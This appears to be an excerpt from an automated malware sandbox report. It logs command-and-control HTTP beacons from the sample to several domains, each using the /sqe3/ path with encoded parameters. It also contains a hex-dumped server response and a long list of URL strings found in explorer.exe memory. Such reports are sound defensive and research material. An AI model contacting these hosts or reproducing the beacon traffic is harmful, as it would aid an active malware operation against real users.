          Source: global trafficHTTP traffic detected: GET /sqe3/?cB=nOVFEnbxdO1KUFG+sKoXHHXF5stR7dv4oa+WZ4s9syusWu0cHacPS3mYPEahtKUV1nLuVQ==&NreT=XJE0G4nHflj HTTP/1.1Host: www.mondzorg-postma.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sqe3/?cB=oXNDcZDlqRKH2hC5SoJ7dwvXOnFb9nMS++dxAtrFY1wLaleqRTsShLolmYf7RNmK9qOopw==&NreT=XJE0G4nHflj HTTP/1.1Host: www.cocogreensoil.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sqe3/?cB=M2gi/2rftereO9YfyWfvr6V5Ia0b0txn97j0jlakpXVUd1e6zNbyBzYXevWhAV4c0pce3g==&NreT=XJE0G4nHflj HTTP/1.1Host: www.moveoneic.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sqe3/?cB=i8a2XrM6c4PzlxrBAf6zuAf3nKYqRmED7KfomvOZBUX2ic3/OKgutfqGct8PuPO2yhcJFA==&NreT=XJE0G4nHflj HTTP/1.1Host: www.antillean-network.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sqe3/?cB=ce2vMfxvjNzpIiuEEVRdBe9TyXbD+nO4E4YWLS1QBhRwWXpWwU+RSJ1ydcmIzRpEWYQ4mQ==&NreT=XJE0G4nHflj HTTP/1.1Host: www.integratednourishment.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sqe3/?cB=cV0NQ3cSoEjVqYMmg/VwqmhA8djIFQLMz29YYbqh0iCirm1PpN4CjJrzlAb4Rx9TAdAIgw==&NreT=XJE0G4nHflj HTTP/1.1Host: www.gregoryrecommends.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sqe3/?cB=doZAOm1JLTF4Hw2qDVobBoiqnusmrIjoueOoEC46DGrv2J4+txpFe/3Q5GbV3HQ5vdwqSA==&NreT=XJE0G4nHflj HTTP/1.1Host: www.yanasacha.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sqe3/?cB=WEY89Cif+pIi2MLF1zVwoU92FBjT7mYFKn7NGwcjA7VjLh+ShZmG13goYNxo9cFbZs7f6w==&NreT=XJE0G4nHflj HTTP/1.1Host: www.bigdillenergy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
          Source: explorer.exe, 00000006.00000000.2144874723.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: unknownDNS traffic detected: queries for: www.nziyade.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: no-cache, must-revalidate, max-age=0Content-Type: text/html; charset=UTF-8Expires: Wed, 11 Jan 1984 05:00:00 GMTServer: Microsoft-IIS/8.5Link: <https://www.nziyade.com/wp-json/>; rel="https://api.w.org/"X-Powered-By: ASP.NETX-Powered-By-Plesk: PleskWinDate: Thu, 26 Nov 2020 20:13:34 GMTConnection: closeContent-Length: 55925Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 74 72 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0d 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 20 2f 3e 0d 0a 0d 0a 09 09 09 09 0d 0a 09 09 09 3c 74 69 74 6c 65 3e 53 61 79 66 61 20 62 75 6c 75 6e 61 6d 61 64 c4 b1 20 26 23 38 32 31 31 3b 20 5a 69 79 61 64 65 20 50 69 64 65 20 26 61 6d 70 3b 20 4b 65 62 61 70 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 73 2e 77 2e 6f 72 67 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 27 20 63 72 6f 73 73 6f 72 69 67 69 6e 20 72 65 6c 3d 27 70 72 65 63 6f 6e 6e 65 63 74 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 5a 69 79 61 64 65 20 50 69 64 65 20 26 61 6d 70 3b 20 4b 65 62 61 70 20 26 72 61 71 75 6f 3b 20 62 65 73 6c 65 6d 65 73 69 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 7a 69 79 61 64 65 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 5a 69 79 61 64 65 20 50 69 64 65 20 26 61 6d 70 3b 20 4b 65 62 61 70 20 26 72 61 71 75 6f 3b 20 79 6f 72 75 6d 20 62 65 73 6c 65 6d 65 73 69 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 7a 69 79 61 64 65 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 09 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 33 2e 30 2e 30 5c 2f
          Source: explorer.exe, 00000006.00000000.2161496067.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://%s.com
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://amazon.fr/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://auone.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161496067.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://auto.search.msn.com/response.asp?MT=
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://br.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.estadao.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.orange.es/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.lycos.es/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busqueda.aol.com.mx/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnet.search.com/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2149883651.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.ask.com/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://find.joins.com/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2144874723.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 00000006.00000000.2144874723.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
          Source: explorer.exe, 00000006.00000000.2145288067.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 00000006.00000000.2145288067.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://rover.ebay.com
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
          Source: explorer.exe, 00000006.00000002.2345242648.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: vbc.exe, 00000004.00000002.2135887620.0000000002341000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.about.com/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.com/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.in/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auone.jp/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.de/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.es/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.in/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.it/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.interpark.com/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nate.com/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nifty.com/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.sify.com/
          Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
